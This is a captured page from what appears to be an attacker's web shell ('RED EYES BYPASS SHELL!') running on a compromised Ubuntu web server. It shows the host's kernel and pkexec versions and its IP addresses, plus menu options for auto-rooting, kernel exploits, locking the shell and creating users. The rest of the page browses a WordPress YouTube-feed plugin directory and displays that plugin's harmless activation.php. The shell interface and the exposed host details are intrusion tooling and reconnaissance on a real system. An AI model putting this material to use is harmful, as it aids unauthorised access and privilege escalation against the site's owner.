Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
pr /
wp-content /
plugins /
feeds-for-youtube /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
frontend
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
README.txt
22.28
KB
-rwxr-xr-x
activation.php
1001
B
-rwxr-xr-x
bootstrap.php
1.58
KB
-rwxr-xr-x
uninstall.php
5.9
KB
-rwxr-xr-x
youtube-feed.php
22.26
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : activation.php
<?php if (!function_exists('sby_on_plugin_activation')) { function sby_on_plugin_activation($plugin) { if (basename($plugin) !== 'youtube-feed.php') { return; } $plugin_to_deactivate = 'feeds-for-youtube'; if (false !== strpos($plugin, $plugin_to_deactivate)) { $plugin_to_deactivate = 'youtube-feed-pro'; } foreach (sby_get_active_plugins() as $basename) { if ($basename === $plugin_to_deactivate . '/youtube-feed.php') { deactivate_plugins($basename); return; } } } function sby_get_active_plugins() { if (is_multisite()) { $active_plugins = array_keys((array)get_site_option('active_sitewide_plugins', array())); } else { $active_plugins = (array)get_option('active_plugins', array()); } return $active_plugins; } } add_action('activated_plugin', 'sby_on_plugin_activation');
Close